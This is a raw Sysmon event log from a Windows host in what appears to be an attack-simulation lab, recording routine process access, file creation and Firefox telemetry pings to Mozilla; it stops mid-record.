12:22:54.468{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.468{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CE1E567B83F009FB72A2D6890E79C371,SHA256=A3ECE4798B5C88DD054A8D060C37A3491CB7467ADFAE0C0F5262D4A646ACD1A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.468{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A708879AFBDB46991F10C5521F4C9940,SHA256=913EB043DBB53FDA9AB40E6D7E54AEC98E0DF9FFF7B209F4F6240FCA675B94C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.468{FE4C2B44-E49E-63C7-4606-00000000AF02}15126064C:\Windows\system32\conhost.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.464{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.464{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla Firefox\pingsender.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.448{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4606-00000000AF02}1512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000043168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.448{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\aborted-session-pingMD5=872DEEF8B05063514770FC4293D1E02E,SHA256=E25486EF502CADC337CD3D7C5987DD145EC147BDC4ED06347E96548FDE1ADA2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.444{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.443{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+1d18d20|C:\Program Files\Mozilla Firefox\xul.dll+188f2db|C:\Program Files\Mozilla Firefox\xul.dll+1a7c83c|C:\Program Files\Mozilla Firefox\xul.dll+1886716|C:\Program Files\Mozilla Firefox\xul.dll+1acb44d|C:\Program Files\Mozilla Firefox\xul.dll+17d27ff|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003E2E136109C) 154100x800000000000000043161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.443{FE4C2B44-E49E-63C7-4506-00000000AF02}6948C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/187bea4f-b4dc-4faf-b227-c20de0e3d306/main/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\187bea4f-b4dc-4faf-b227-c20de0e3d306C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000043160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.439{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.439{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.434{FE4C2B44-E49E-63C7-4406-00000000AF02}26366968C:\Windows\system32\conhost.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-E49E-63C7-4206-00000000AF02}3916352C:\Windows\system32\conhost.exe{FE4C2B44-E49E-63C7-4106-00000000AF02}6820C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4406-00000000AF02}2636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+2227102|C:\Program Files\Mozilla Firefox\xul.dll+2226f05|C:\Program Files\Mozilla Firefox\xul.dll+2226f51|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|C:\Program Files\Mozilla Firefox\xul.dll+1e7daf6|C:\Program Files\Mozilla Firefox\xul.dll+188f6af|C:\Program Files\Mozilla Firefox\xul.dll+1d18d20|C:\Program Files\Mozilla Firefox\xul.dll+188f2db|C:\Program Files\Mozilla Firefox\xul.dll+1a7c83c|C:\Program Files\Mozilla Firefox\xul.dll+1886716|C:\Program Files\Mozilla Firefox\xul.dll+1acb44d|C:\Program Files\Mozilla Firefox\xul.dll+17d27ff|C:\Program Files\Mozilla Firefox\xul.dll+2056112|C:\Program Files\Mozilla Firefox\xul.dll+1acf5b8|C:\Program Files\Mozilla Firefox\xul.dll+1ad176f|UNKNOWN(000003E2E136109C) 154100x800000000000000043146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.418{FE4C2B44-E49E-63C7-4306-00000000AF02}5300C:\Program Files\Mozilla Firefox\pingsender.exe109.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/a6bcb75e-9886-499a-9eec-f1d6ca059c7a/health/Firefox/109.0/release/20230112150232?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\saved-telemetry-pings\a6bcb75e-9886-499a-9eec-f1d6ca059c7aC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=81936B521FDC389CAE219484DEC34395,SHA256=6FB414545198766879F8420A7F09C5B06108A61310E7D113FB4565F1195D60AC,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000043145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E49E-63C7-4006-00000000AF02}6444C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.417{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E49E-63C7-4206-00000000AF02}3916C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:54.412{FE4C2B44-E49E-63C7-4006-00000000AF02}64446656C:\Windows\system32\conhost.exe{FE4C2B44-E49E-63C7-3F06-00000000AF02}3596C:\Program Files\Mozilla 